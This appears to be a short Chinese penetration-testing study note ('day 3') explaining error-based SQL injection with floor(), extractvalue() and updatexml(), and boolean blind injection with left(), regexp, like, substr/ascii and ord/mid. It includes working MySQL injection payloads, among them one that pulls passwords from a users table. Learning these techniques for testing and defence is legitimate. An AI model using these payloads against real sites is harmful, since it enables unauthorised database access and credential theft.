渗透测试 day3

报错注入

原理:构造payload让信息通过错误提示回显出来

应用场景:查询不会先内容,但是会打印错误信息

upload、insert等语句,会打印错误信息

方法:凡是可以让错误信息显示的函数(语句),都能实现报错注入

floor()

select count(*) from infomation_schema.tables group by concat((select version(),floor(rand(0)*2));

 渗透测试 day3

 

 

extractvalue()

 渗透测试 day3

 

 

updatexml()

 渗透测试 day3

 

 

如果返回值超过32位,显示不出来,就使用substrr进行截取

and updatexml(1,concat(0x7e,(select substr(concat(password),1,2)from users limit 0,1),0x7e),1)--+

布尔盲注

原理:我们可以通过构造语句,来判断数据库信息的正确性,在通过页面的“真”和“假”来识别我们的判断是否正确,这就是布尔盲注。

方法:

构造逻辑判断语句,判断信息的真假,取出所有的真值,实现SQL注入

1、 left()函数 left(database(),b)>'a'

//database() 显示数据库名称,left(a,b)从左侧截取前b位

2、 regexp

//select user() regexp '^r' 正则表达式的用法,user()结果为root,regexp为匹配root的正则表达式

3、 like

//select user() like 'ro%',与regexp类似,使用like进行匹配

4、 substr()函数

ascii()函数

//ascii(substr((select database()),1,1))=115 避免过滤和转义单引号

5、 ord()函数

mid()函数

//ord(mid((select user()),1,1))=114

mid(a,b,c)从位置b开始,截取a字符串的c位。ord()函数同ascii(),将字符转为ascii值

 

上一篇:js 单引号和双引号相互替换的实现方法


下一篇:正则表达式